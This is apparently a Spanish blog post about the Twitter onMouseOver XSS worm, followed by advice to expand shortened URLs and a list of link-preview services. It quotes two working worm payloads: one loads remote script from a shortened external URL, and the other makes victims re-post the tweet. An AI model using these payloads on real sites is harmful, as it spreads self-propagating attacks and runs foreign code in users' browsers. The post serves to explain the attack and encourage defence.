enlarge your URL!

Hoy en día Twitter está siendo uno de los principales objetivos para explotar nuevas vulnerabilidades y probar diversos tipos de ataques. Sirva de ejemplo el último y reciente XSS que, aunque ya ha sido corregido, ha podido afectar en tan sólo unas horas a muchos usuarios simplemente pasando el cursor del ratón por encima del tuit malicioso (onMouseOver):

código ejemplo 1:
$('#status').val("http://t.co/@\"style=\"font-size:999999999999px;\"onmouseover=\"$.getScript('http:\\u002f\\u002fis.gd\\u002ffl9A7')\"/");
$('.status-update-form').submit();

código ejemplo 2:
http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()

Sin embargo muchas veces no es necesario ninguna vulnerabilidad para que seamos redireccionados a un sitio malicioso... simplemente pinchamos una URL acortada con demasiada ligereza.

Hablamos por tanto de la importancia del "agrandamiento" de URLs que han sido previamente acortadas. No seáis mal pensad@s...X-), se trata de previsualizar el nombre completo del enlace para que, en la medida de lo posible, podamos identificar un sitio sospechoso o aparentemente no demasiado confiable.

Para ello y al igual que existen servicios online gratuitos para la reducción de URLs también existen servicios para expandirlos y previsualizar a dónde vamos a ser redirigidos. Y no sólo eso, además estos servicios incluyen algunas utilidades o herramientas como extensiones de Firefox, scripts de Greasemonkey e incluso APIs para desarrolladores web. Todas ellas nos facilitarán de forma transparente la previsualización de URLs.

En definitiva, nunca está de más tomar medidas de seguridad así que a continuación os dejo unos cuantos enlaces por si quereis utilizar estos servicios:

- Long URL Please

- LongURL

- ExpandMyURL
- RealURL

- Sucuri
- Untr.im

- Voizle

- Unshortn

Comentarios